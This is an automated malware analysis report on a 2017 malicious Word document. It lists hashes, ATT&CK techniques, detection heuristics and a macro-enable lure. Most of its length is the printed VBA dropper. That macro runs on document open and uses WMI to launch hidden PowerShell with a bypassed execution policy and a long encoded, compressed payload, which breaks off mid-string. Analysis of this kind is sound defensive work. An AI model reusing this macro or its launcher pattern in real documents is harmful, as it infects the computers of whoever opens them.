Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 42a4d9527063f730…

MALICIOUS

Office (OLE)

140.5 KB Created: 2017-03-08 09:29:00 Authoring application: Microsoft Office Word First seen: 2017-05-29
MD5: e36d7fc794563090ffc1bd5784c67c05 SHA-1: 678465e043572836726b3fcb59788e4544a58681 SHA-256: 42a4d9527063f73004b049a093a34a4fc3b6ea9505cb9b50b895486cb2dca94b
390 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution T1059.005 Visual Basic

The sample contains a VBA macro that executes a PowerShell command. The macro uses WMI to launch PowerShell with a hidden window and bypasses execution policy. The PowerShell command itself is heavily encoded, but its presence indicates a secondary payload is likely being downloaded and executed. The document body attempts to lure the user into enabling macros by claiming the document is protected.

Heuristics 11

  • ClamAV: Doc.Dropper.Donoff-5743532-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743532-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
                    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
                objProcess.Create "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYA …
& "AdAA4AHYAdgA3AGgAcgA3AGUAZQBmADkARQAyAHoAYQBwADcAeAB3AGYALwA4ADQANwB4AE0AMgBWAFUAdgBtACsAYwBHAEMANwBUAG4AWABUAGsATgA5ADUAcwB2AGQAKwBjAGwAZgB6AEYAVgBjAGgAZABJAFoARwAvAGMAQwArAG0ANgBKAFAATABDAEgAVwBkAGgAUwBmAEoARQBtAFQAUwAyAE4ARwA3AFcAawB2AG0ATgBlAHAAWgBnAG4ATgBjAHQAQwB1ADAAWQA2ADYAYwA2AGsARABRAGgAOQBNAFkASABKAFgATwAwAGoAVwA2AHgAUwBLAE0AcwByAHEAdwA2AGsAdQA3AFMAeAA5AFcAawBjAFAAeAB0AFQAcgAzAGoAZwBaAFMAawBqAFMAWAAyAEUAcQBWADEARwBjAG4ARwB6AHQAUwBMADgAWABJADkAKwBXAG8AbwBUAG0AMABvADQAcAA2AHUASgB1ADMA …
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script
                    strComputer = "."
                Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
                    strComputer = "."
                Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
        Sub Document_Open()
        Execute
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://pngimages.net/sites/default/files/brown-locked-png-image-880.png In document text (OLE body)
    • https://upload.wikimedia.org/wikipedia/en/thumb/8/81/MS_Office_2007_Logo.svg/1024px-MS_Office_2007_Logo.svg.pngIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14929 bytes
SHA-256: f796eeb71f4e73346bb47f9e3ed41da1e5cb118c3de70a43834d363a60781433
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains a PowerShell -EncodedCommand style payload. Carved artifact contains 17 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
        Sub Document_Open()
        Execute
        errorb
        End Sub
             Public Function Execute() As Variant
                Const HIDDEN_WINDOW = 0
                strComputer = "."
                Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
         
                Set objStartup = objWMIService.Get("Win32_ProcessStartup")
                Set objConfig = objStartup.SpawnInstance_
                objConfig.ShowWindow = HIDDEN_WINDOW
                Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
                objProcess.Create "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAegBWAGwATgBkADYATgBJAGwAdAAzAFAATwBmAE0AZgBjAHQAZgBUAGkANgB6AGgAdwA4AG8AcwBWAFoAOQBlAFMAQgBnAFEAUwBNAEkARwBpAFEAQwBpAGEAeABaADgAeQBBAGcASQBFAEcAawBoAFMAMwBEADYAeAA4ADgATgBrAEcAegBKAHoAcQB6AHUAMAA0AHUAcQBXAHYAagBZAFMARQBIAEUAKwA3AGoAdgB2AHYAdgBDAC8AMQBpADEAKwAyAFoAVAAvAHIAVABlAG4ASgBxAGYAMQBDAHIAZQBKAFYAbQBWAC8" _
& "AdAA4AHYAdgA3AGgAcgA3AGUAZQBmADkARQAyAHoAYQBwADcAeAB3AGYALwA4ADQANwB4AE0AMgBWAFUAdgBtACsAYwBHAEMANwBUAG4AWABUAGsATgA5ADUAcwB2AGQAKwBjAGwAZgB6AEYAVgBjAGgAZABJAFoARwAvAGMAQwArAG0ANgBKAFAATABDAEgAVwBkAGgAUwBmAEoARQBtAFQAUwAyAE4ARwA3AFcAawB2AG0ATgBlAHAAWgBnAG4ATgBjAHQAQwB1ADAAWQA2ADYAYwA2AGsARABRAGgAOQBNAFkASABKAFgATwAwAGoAVwA2AHgAUwBLAE0AcwByAHEAdwA2AGsAdQA3AFMAeAA5AFcAawBjAFAAeAB0AFQAcgAzAGoAZwBaAFMAawBqAFMAWAAyAEUAcQBWADEARwBjAG4ARwB6AHQAUwBMADgAWABJADkAKwBXAG8AbwBUAG0AMABvADQAcAA2AHUASgB1ADMAeQBmAHAALwBpADgAKwBkADUAeQA3ADQAcQB4AFkAZwBsAHIAVwBnAG0ATwBtAG4AYwBtAGYAawBTADYANgBSAE4AWgBrAFcANgBJAE4ATgB0AG8AcQBlAHAAVQBXAHcAWAB0AHUAaAArADgAVABYAHIAaABWAGEATwBIAFAAZwBtADgAMQBXAHgARABtAFMAcwBsAGMAWgBsAG8AcAAwAGUAYQBVAGwAaABIADQAbQB4ADUAMgBHAHAAbgBkAGgAZwAzADIAawBOAFAAOABTADQAWgBNAEoAbQBaAGEAUQBMAGQ" _
& "ANwBTAE4AUABEAGUAMQBQAFMAdQBuAHYAdABXAFIAdwBuAHgAYwByAHkAWgBYAFoAegBKADMANAAwACsAWgBvAFQAcgArAFcAagBSAFYAMgBPAG8ARgAzAGsAbQBFAHYAUwBmADgAcgBVAGUAeQBtAGQAUABWADkARwBkAEQASABZAHUASgBJAGoANABrADMAbQBuAC8AZQA5AHMATwBtADYAZABFADAAdABxAG8AWgBBAGMAcQBMAC8AawA1AGIAUwBSAFAAawBRAGQAbgBSAEcAYgBzAEMAUAB0AFUASQBvAHgAWABEAG4ASgBKAFMAbQAyAGYANABKADAAbABmAEgAVABLAGMAUgB0AEkAYgB2AHEAawBUAEIAOABUADMAMgA3AFcARgBkAGwASABrAC8AcQBCACsAbgBHAHoAOABoADAAVwBYAGUAMABEAFgAKwAzAEEAZAAzAGEARwBZAGgAbwByAHcAUwBJAFAANwBMAFMATwBKAEMAbwBrAE8ASgBlAFMAawB4AFYANgBGAHQAYgAyAC8AcwBSAHIAaQBaAFoANABaAGoANQB5AHUAOABpAG4ATQBlADAAeABjAEkAcABkAEMAWABqAHkAegBSAG8AeABqAFgAbABjAEUASgA4AGMAUAB3AFUAcABHAGUATAAxADUAbwArAGoAcwB5ADcAdwB6AEQAMQAxAE4AUwBIAFIAdABUAHgARQBIAEsAawAzAEUAbQBLAEIASABWAHcAdABnAEgAOQAwAEcAOAAwAEkATQArADcAVgAzAC8AVAAxADc" _
& "ATgA5ADgAdwBEAE0AVABxAEMAZgBhAGMAVABrACsAVQB0ADkARQAvAEoAQgBqAEgAZABoAFYASgB0AGwASwBiAGUANwBKAHUAbwBaADkAaQBQADAAcwAyAGMAWQBsAGkAZABjAGUAeQA3AEcAMgA0AHoANwA2ADYAcgBpAGsASgBjAHMAcABPAFIAYgBoADYAdQA3AG8ANgAwAE0ATgBJAEgAOABzAGsARQBrAGIAKwBzADcASQAxADcAZwBkAEQAcAA0AGQAUgBqAFYAYQBJADQAWQBaAFkAdgBZAFEAZQBDAEwASABUAGgAMQBMAFcAaABiAHAAeABJAHcAcQBoADgAVQBsADgASwBIAFMARwBzAC8AZAB5AGgAdgBaAEoATAB2AE4AeQAyADkAZwBiADgAQwBiAC8AUwBmAEsARQBTAEUASAArAEYAWgBTADkALwBSAHkANABZAEwALwBOAEUAOQBQADkAaAAvAEcARABUAEwAaQBXAGwAegBuADAAMABCAE8AMQBxAFgAVwB3AE0ANQBwAEkARgBrAHMAbABpADMAUABMAHMAYgBXAHUALwBwAC8AdwB4AE4AeABSAHIARwBPAHUARwBqAEoAbwAxAHYAWQBpAEIATgA5AGkAVQB1AEwALwBjADYAMgB3AGsAYgBOAHgAeAA2AEgAMABCAHQAVgBjAGYAdgBIADQAeQBxAFIAeABpADIAOQA1AGkAMQB5ADQAagBFAFQAZQBDACsAaABuAHUATwBGAEgAcABHAHYANwBGAGQARAAzADkAbwBHADU" _
& "AWQBuAFoAdgBpAE0ARQBuAHIAVgBEAHoAVABMAFUAegBKACsAbQBUAHYANQBUAGYAMgBDAC8AQQBKAHcAYwBxAE8ALwBvAG8AWABkAGkAZgB4AG8AdQBtAHkAWABBAHEAZgBOAEgAMQAvADEAdgA1ADAAawBkAGEAcwBRAFYAeABqAHIAUgBrAHEAbABiAHYAUABOAEoAUwArAHEAbwBkAEYANABTADIAWQBwAHQAMQBBAFIAOABQAGkAUwB2AE8AbQBRAFUAdQB4AFUANQB2AEgASwB4AFIAbwA0AFUAcwBhAEsAKwA4AFQAMwBiADEAcwBuAE0AeABGADcAeABtAHcAOQBLAGMAZwA5ADgAawBGAGoAQwB2AHUATABKAFQAdQBBADcAOABCAEEANwArAGoAaABQAHoAdABqADAAZABlAHMAbABLAG8ATgBEAFUAcABxAGQAMgBiADcANQBaAGMANwBTAHMAUwBtAGEAcwAyAGoAbQBtAEUANwBIAGEAdgBEAEcAUQB5AFQAVwAvAG0AWgBtADMAVQBmAHEAYQBFADkAVgBTADAAawBZAGEAMgBMAE4AMgBUAG8AaQA3AFkATABDAG0AagA2ADQAVABLAGUAYQBRADUAZABDAGYAUQB5AEUAcgBaAE0AUQB0AFYAdQBWAEoAKwBwAHAANQBwADcAYwBtAC8ATwBZADEAUAA0ADYAbgB5ADUAcwBvAFEANwBJADIAbgB6AFkAZQBGAHAAZwA1ADkATQBsADkAbgB2AHgAVwBIAEsASABIAE4AUwBoADA" _
& "ATgBCAGwAegBvAFMAQQBKAFgAcABDADYAbgB0ADcAegBVAHkAcwBsADQAUABjAEsAaQBMAGQATwBxAHoATABjAFUAagBrAGIAYgBmAFcAUgBjAC8AUwA2AGoAVgBxAHoAVgB1AFcASgA5AEUAcgA0AHQARgBTAGQARABzADMASgA1AGsAagBrAGkAcAB3AGsAMwAwAG8AMQBqAE4AUwBFAGQAUAB1AE4ASgAyADYAaQBSAGUAVwBUAHUAQgBXADAAMgB5AFoARQB5AGYASQB6AGIAdABZAEsANwBwAFEAUwBwAHkAbwBQAE0AawBlADIAVAA1AHMAQwBuAGEALwA5AEUAbQAyAHIATABhAFMAbAB4AHQAMwBWAEQAagA1AGwAawAvAHoAbABWAHAATABYAGkAbgB1AFkANwBFAC8ATAA0AHkAOABVACsAYwB4AFMAMwBIAFUAOABYADYAagAwAFgAegBKADYAQwBqAG8AdABEAHYAWABjAC8AeABWAFoAVwAyAEoATQBNAHAAZAAyAEkAUAB6AC8ASwBWADMAeQBpAEoAbQBmAHYARgBVADYAaQBXAHcAeAA4AG0AbgBvAGEAYwB5AEUAZgBHAHgATgBpAHEAcgA0AGgAbQBsAGsAVAA5ADEAWQBhADgAWABTACsAYQA5AFIAYQB5AEMAZABFADcAbAByAFkAMQBSAG8AcAB1ACsAVQA1AEgAUQBsAGgAUABaAGwAaABCAC8AMwBiAG0AMwBxADkAdgAxAFAARAA3AE8AbQBrAGgAVQBUAFgAYQB4AGI" _
& "AagBhAEIAcwBLADgAVQAxAHEAdwAzAFAAcQA5AHAANABVAEQAUQA3AHgATgBsAHAARQBVAGwATwBFAEcASAB4AGgASwBGAEwAdwArAE0AdQBFADYAZQBIAGgAeQBKAEMASwA3AHMAdABKAHgAdgA1ADkAcgBiAE8AOQBEAE0AdwBBAE8ANABTAGMAUABhAGcAcgBhAFIASgBDAHEAQgBiAHoARQByAGQAeQA0AFkAMgB3AEUAZgA5AGYAeABOAE8ALwBhADgAWQBLAGgATAA5AEEATABTAG8AYQA0ADcAYQBBAG8AUgAzAEYARQBIADQAawBtAE4ASgBFAHUATQBQAE8AQgA2AFoAcwBVAEIAOQBxAGIAWgBTAEEAcQBxADUAUgB5ADYATwB3AGYARwB3AFYARQB4ADkAUABaADAAcwBtAGwAUgA4ADMAcABSAFEAWAB0AFgANABjAHcAUgA0AHYAdgBkAHkANgBKAFQAdQB3AGYAbABEAGoAMQBVAFAAVgBpAGQAZQAxAGoAbQBoAHIAeQBRAGcAegBaAHEAZgA2ADQAZQAyAGsAawBWAHkAdwA0ADQAUQBLAHYAbwAwAEoAUAA2AGQAKwAyAHUAagBnAG4AcwBSAFEAMgBCAEQAdwBpADAAQwA4AHQAOQAxAFgAbABCAHoAeABtADAAVwBCAHUAagBQAHkAZAA1AE8AQwBPAEgAVQBMAFQAcQBUAGUAbABXAGoAMgB2ADEAdQBNAHgAdAAvAG4AawBMAG4AbQBzADMAcgB2AFcAUwBZAEsAMwBaAEM" _
& "AZQAyAFQAdgBaAHUAagBsAGcAVgB3AEoAbgBSAFIAMAArAEcASAA4ACsAOQAxAGIAUgAwAHYAdABVAFcAdgBhACsAdQB0AFgAZwAvAHgAYgBIAGsAeQAwAG4AcQBiAHoASABpADgAagBYAFEATwByAFQAdQBYAGUAQQArADkAaQB0AG4AcwBOAFcAYgBGAEQAMgBLAFcASwBaAGgAQgBZAEIAZgA0AEQAZgBOAEkATgBtAFYARABYAHQAMwA1ADUAcgBoAEwARABXAFcAUwB4AHIAcgBXAEIAcAA2AHcAOAAyAFMATAAyADgAdgB6AG4AWgBvAHoAaAAyADEAbQBkAHEAMQBrAEUANwA2AG0AQwBDAHAAdwBzAEwALwBrAE0AWQA5AGMAbQBYAFcAOAB2AHkAOQBZAHYAKwBiAGcAWQBPADkASQBjAHAARABqAEoASABuAEkAYQAwAEwAVQA0AEcANQBSAEoATgBCADgASgB2AEIASQB1AHIAbgBpADQATgAyAHQATQBMAGUASAA4AHoAdwBCAC8ARgBGAHgAdgBuAEwANABlAGoAYwBTAHoARwAwAHMAdQBaAEsAbABuAGMAOQB2ADAAOAB0ADUAdABWAEkASgBjADYAVwBrAEkAbQB6AHUATwBkAGYAUQBvAFQAbQBsAGMAWQBGAGUAOQAzAFcAdwBiAFgAcABFAC8AOQA5AEcAcQAyADAAVQBuADMASABwAFkAdwA3AHIAMQA2AHkASwBPAFQALwBQADAASAA0AEgAYgBPAHQAOQBUAE8AdQA1AFg" _
& "AWQArAFYAZABEAGUAbgA0AEcAQgBvADQAMwA0AHUAcABOAGgAMwA1AFUAOAA3AHAAZABvAFAAOQBxAEMAMwBJAHIAZABqAEkAegBPAEcAWgB6ADIAUgBJADYAOQBJAGkAYwBRAE8AeQA4ADUAOABRAHMAOABUAGUATgA4AE4AQgBhADAASQAvAEMAbgB2AG8ALwBjAEQANQBoAFAAMAA0AEsASAAzAEcARQBQADkAOQBMAHgAdQBGAE0AeABHAEQAdgBxACsAUwArADkARgBOADYANwBBADQAeABuAHEAYgBKAGIAcwA4AEMANwBiAHQATQA3AFQAQQBtAHQAcwB6AHkAbgBRAEsANwBwAFkAMwBCADgAUgBJAC8AVABzAHMAYgBEAFcAMgBUAE8AMABYAGIAVgBjAEIANgBOADUAbABvAHkATgAyAFQARQAxAFYAOQBPAHYAcABzADYATwAwAEYAUABqAHMANgAzAHAAdgBKADEAawBpADUAWAB4AGoATwBlAFAAZQAvAG4AQwA0AE0AZgBNAFoATQBtAE0AdABGAEUAMgBLAFUATAA0AHUANgBnAHMATQBXAEMAdgBPAFQAMABOAHMAYgBuAEYAWQBnAEoAOQA4AHgAcQBYADIAUgBUADkAVwAyAHMAUQArADIANgBJAGEANQBMAGcAUABHAEIAcwAyAHYASgBaAGwAZgB0ADkAdwBSAEMAKwBIAHgAbQB6AFMAegB4ADcASABHAEQAVwBvAEMAKwBoADUARABhAFkAdwBZACsAOQBiAFgAegArAGg" _
& "AaQAzADAAKwBqAGsAZAAzAG4AOQBhAFQAWABQAFUAWgB4ADQAcQAxADMAaQAyAFIAcwBBAFEAaQA5AHgAKwAzAGoAbgAyAE4AagBJAGgAdgBkAFQASgBlAHgAOABwAGIAQQBkAHUAegA3AFkATABjADEANwB6ADEAMwBuAHYAKwBVAGgARgBIAFUAeAArAEcANgB2AFEASQBmAHYAMwBmAGkAbAAyAFUAVQBRAEsANABxAC8AMgBlAHYAbwB4AEsARwB2AG8AWAB6AHQAOQB0AFoAWAByAGIARwBYAGsAVQB3AC8AWQAwAEIAbQA0AHcALwA2AHEAcABJAFYAcAA2AGsAZgB3AGgAdgBtAHkAZwBlAGIAbQB0AGMAcQB4AHQARwBBAEoAQwA1AGoASgBZAHAAOQBBADEALwBjADEATgB3AE4AZgBuAGYARQB0ADgAagAyADQAdAByAHIAYgByAE4ATAA2ADQAYgBnAHoAbABaAFcAegBYAHoAQwB1AEYAYgBhAGoAUgBXAEcAMQAwAEgAbQBjAG0AMwBnAC8ANwAvAGgAOQBpAFMAZgAwAFoAOQA4AGoAcABnAFgAbgB4AHQARABUADkAcgBiAFUAegA2ADEAOABiADMAUQB0AHUAawAyAEEAVABWAHMAMgBHAGQAWABCAFIAegBxAEQAdABsAGkAZQA3AFYAUAA3AGUANQBKAEkARwBhAG0AUgBuAEIAdwBpAGYAYgB5AGwAYgAzAFcAZgBtAFYAagBVAGMAMQBmAEoASwB1AC8ATQA3AGYANgBxAEs" _
& "ATQBBAGgAdwBQADYAeABOAHIATABpAE8AdQBlAGMAZAAvAEgANQBIAFcAWQBsADkAVABVAFAAUQAwADEAWgA0AEgAWgByAGgAOQBxAEgAMQByAEkAUABSAEUASwBQADUAegBNAGYANgBvAG4AagB5AEEAZgBHAHoAOQB3ADIAYwBDAEMAdgBPAGUAaABWADQASwAzAGsAZgB0AEoAegBQAHAANAArAFkAcgBhAEQAegA0AFUATABQAEgARQBmAC8AdwBWADIAbgA2AGwAZgA3AEkAMwBiAHoALwBMAEkAYwAwAHkAcQBIAE4ATQByAHYAdQAxAHIAaQBlADkAMwB3AFkASABKAE0AZQAvAFIAZQBzAE0AeABvAEIAagAvAGkAOQBtAGcAdAAvAHMAUgArAGgAcABjAHQARQBJADkAaQBOAEgATQBCAGkAZgBZAFkAMQBOAHYAMgBHAFoARgBzAFMALwAvADIAMgBxAG8AeQBnAHIAagBqAEgATQA4ADcAMgBEADcAYwAxAC8ATABXAHQATgB3AGYAZQBtAHYAZAAxADkAbwBlAFgAcgBwAFoAMAAvAGcATwBaAGIASgBIAHYAbABjAHcAcQArAEsAegAyAGkATABkAG4ASwBkAGcANQB1AGUANQAxADgANABWAFcAYwBsAGMAagBKADgAeAArADkAZwBQAEgASQB5ADcAaQBmADEAVABhADMAbwBXAHkARwBaAFQAWQBFADEATwB6AFUAeQBoADkAZABnAEcAZgBwAHAAeQBYADEAOQBYAEQAbgB0ADI" _
& "AWQBmAHMAWABCAHQAagB5AHUAUAB1AFgAOQBkADAAYgA0AGYAWQAzAHkARgBrAHMAUAA5ACsAYwBwAE0AegBDAHQAMABKAEcANwA0ADkARAByAFAAegB0AC8AUABzAGoASABlADIANgBCAGQATgBoADEANgBQACsAZABuADUATgByAC8AZAA4AHgAeQBYADMAcgBaAEwASABNAGQAbQBHADMAOQBZAEUAMwBvAEIAZQBIADAAMwArAFAAYgBtADYANgAyAFAATgAzAHMATwBzAGUAWQAxAGMAaABYAFgATgBmAHAAOAA5ADkAWQBuAGQAdAAvAE0AWABqAC8AVABtAG8AcgA3ADYAbQB6AHIATwB2AFIAcgBaAG8AcABDAGYAZQAzAGYAZABSAHgANgBMAHQARQB1AGUAeQBJAFcAUAA0AGoAdABzAE4AOQArAEgATwBsAGEAbAB5AGcAVQBNAFYANgBPAFgAKwAxAEsAMwA5AHYAOQAzAFoAaABmAC8AWgB4ADkASAB2AHIAQQBKAFYAOABIAFYAeQBiAFoAaABiADkANAAvAE8AZQB2AG0AaQB5AEoAVABHAGsANAB5ADUAWABZAEYANwBwAEsAawBvAFgAeQA0ACsAOAB1AFcAUAA4AFgAdQBlAEUAOAB0AG8ATQBHAE8AdgBMACsAagBGAG8AbwB3AEcAOABNADIATAB3AHoAeQAyAEUALwBZAE8AbQBiAFcAUwBFADIAbgBYAEQATwAvAFQANwA3AEUATQBjAEwATAAzAHoASQA3ACsAMQBaAFE" _
& "ANgA2AFQAeAAxAFUAYgAxAHgAdQBKADYAeABSAHcATwBmAHIAcAAwADAAZABiAE8AYgBiAHkAUwBPAGIAOABSAHQAcQBQAGUAUgBNAGEANQBQAG8ASABaAHcANAA2AHMAWgAvAEoAdgBJAFEAWgAxAHoARwBTAGUAWAA4AHgAUgAzAGEAUABlAHgAdgAxAHgAcgA0AEcAOABDADMAdwBtAHYARwBIAE0AOABDAGIANgBDAGYAQwBnAGwAaAA3ADYAcABFAGoAOABBADkAKwBkAHEALwA1AGMAWAB5AHAAcgBZADgANgBpAHUAcwB6ADgATQBhAHIAagBnAEwARwBKAEQASQA2AHoAOQBXAGMAYwB6AGoAbgBYAHQAbABsAEMAWgBGAHMAYgBxAEYAbAArAGgAbQBWAFkAOQBWAFgAYgBQAGcAQwAvAC8ATgBhADUASgBvADIANgB1ADgAQQBpAGcAUABmADUANABJADEANwB1ADkAYwBRAC8AMwBLADkAbQBWAG0AdgB6AHEAbgB1AE4AUwBXAHcARABYAEwAdQB6AHIAdAAxAC8ARgBhADQAbgBsAGYAdQBIADAAdQBlAEoAOQBMAGUANwA0AGIAdABQAHUAMQByAHoAWABOADAAdQBFAGQAUgBXAHkARwAzAGoANwBKAGYASABZAHEANQBxADIAZABmAFkAOABEAHIAagBpAGYAOAAvAFQAMwA0ADMAYQBPAFQAUwBSAHoANwBUAHYAWgA5AGIAYQBRAHAAQQBsAGYALwAxADgAdwA5AFUAUAB2AHI" _
& "AbAB1AHkAOABTAE8ALwBtADgARwA1AG4ATwBjAHYAMgByAEYARwBuACsAYgAzAEMAQgBmAGQAOQAzAEwAVwBWAFAAZwA5AFcAdgBQAC8ASgB5AFIASwBXAG0AMwBrAEUALwBnAEgALwBVAEEAOAA2ADQALwBWADYASwB3AHIAawAyAEcATgBPAGgANgAwAFMARwBYAHgALwByAHAAQwB6ADMANQBCAEQAOQBBAHcAMAB3AGsAYgBsACsAdAA5AHMAKwA2ADEAOABvADIAdABQAEgAOQBiAHoAZwA4AE4AawBUAEMARQBYAHYANgBmAHcAZQA4AE8AOABtAFgAcgBDAC8AMQBkAEMAbQBMAEkAKwA4AC8AbAAzAE8ASwB3AEYAcQAxAHAAagBMAG8ASwAvAGYANQB1AEYANwAzAFYAcgBaACsAUQA1AHoAbgBYAE0AWQByAG8AUgB4ADUANwAxAFMASwB2AGUAcABYAGYASwBmAFMANgBkAEYAUgBkADkATQBsADgATgBmAEwANABmAE4ASgByAE4AdgAvAEkAcwBmAFEAeQA2AEUANwAyAE0AKwAvAHgAawBXAHgARgBTAHkATABVAGIAMwAzAEsAZwBTADIAOQBOAHUAZwAxAEEASABxAFIAOQBBAEMATgBEAGgAOQBGAFgAbAA5AG4AYgBIADEANQB5AEwANgBMAHUAZgBQAG4ANAAyADYATwAzAG0AWQBxADIAdwBxADYAdwBIAFIAbgB5ACsALwBzAC8AegByAC8AWABEADUANwAxAGUAVAAwAFA" _
& "AYQAvAG0ANAArADEAWgB5ADQAMgBCAGwAUwByAGsATwBmAFcATgBrAHMAOQBuAHcAVgByAGcAUABrAEcAZgBPADkAdgA1AHkAcgBqAHUAaQBkAGoAbgBxAHAAZAA2AGkAWABEAHUAaQA2AGIAaQBYAGIANgBmAE4ASgBHAEgAUABmAGcAcwB4ADAAWQB4AFYAZgBhAEYAawBiAEYAZQBIAHkAbgBFADQAbgBIAG0AZQBsAC8AZwAyAG0AcgBBAEoAagB2AGYAMwArAEgAZABDAGYAYQB4ADIAWgBYAHUAWQBRAFYALwA3ACsAbABWAHIAKwB4ACsAbwBHAGMAKwA2AEIAZwBlAEkANQB5AEQAVwBvAEcAZQBtAFEAOAAxAFUARgAvAE4ASwBQAG4AbAB1AHgANgB6AFYAMwBGAFoAKwBJAGcANwBhAHUAcwBSAG0AcQAvAGYASwB4AGQAdgA5AGoASgBMAFYAbwBDAFQAKwBYADYAWAAzAHQANwBYAEoAbgBvADUAOQAvAHQAQQBaADgAdgBEAEcAagBtAGsATQB2AGQASgByAE4ARABQAGgAUABlADEAegAyAGYAUwBaAE4AYgBYADMATQAxADcAcgBqAHoAZABoAHoANQB5AEwAZQArAC8AUABGAFIAQwB0AGIAagBWADcAMgBjADkAWgBSADIAaABpAFEAWABnAGMAcgBpAG4ANgAyAGMAOABrADAAWABlAFcASwBJAHUAYQBlAEsAWgBNADMATAA0AFQARgA4AHkARgByAGYARgBMAGUAZAA0AGQ" _
& "AbgAvAG0AYwBEADQAdwBxAGcAbgB2ADkASQBoAFkAYwBFADYAQwByAHUAVQB6AEwAKwBkAHUAcgB1AGsARgBZAFAAdgBrADMALwBRAEkAMwBpADgASAB6AHAAagByAFIAQQBxADgAWQA5AHAAcgBNADMARABlADUAZgA5AFAAcgA3AFAAbQBhAG4ATAByAE8ALwBUAFIAcQA0AFoAbwBKAHcAMgBlADQAWQArAFcAOAB6AGsATgBzADQARwB3AG0ASABHAC8AOABYAGUALwBQAHYANgAzADMALwBVAFYAOABhAHUAbABEAEYAeABqAHQAawBLAHoAVwBBAG4AVgBkAFUAOAA1AHYANABOAGMAWQA0AGIAcAA1ACsAZABoAHYAeAB1AGQATABDAEYAdgBiAHoAcgBrAHoATABjADkAcABqACsAdQBmAGMATgBnAHoAKwArADMAbgBIAHEAdAAzAGYAbgBkAG8AOABYADYASABwAFgAVwBjAHEAZwB6ADYATABpADAAQQBLACsASgBGAFAAMQBQAHkAWABvAHMAOABkAHIAbABPAEYAdAB3AHIAaAA3ADYASwBOAGUAOQBrADQAYgA2ADYAdQBzAGUAYwB4ADkAYQBtACsAYwBPAHYAVABEAFMATQBlACsAZwAxAHYAaABkAEwAKwBxAEoANAAvAGkAMAB6AEgARgArAFMAVABDADMAawBiAGUAKwBpAG4ATQBUAGEAVgB0AEgANABJAFQANQArADEANwBVADkAMABuAHcAawBDAGQAdQBvAC8ATABjAGU" _
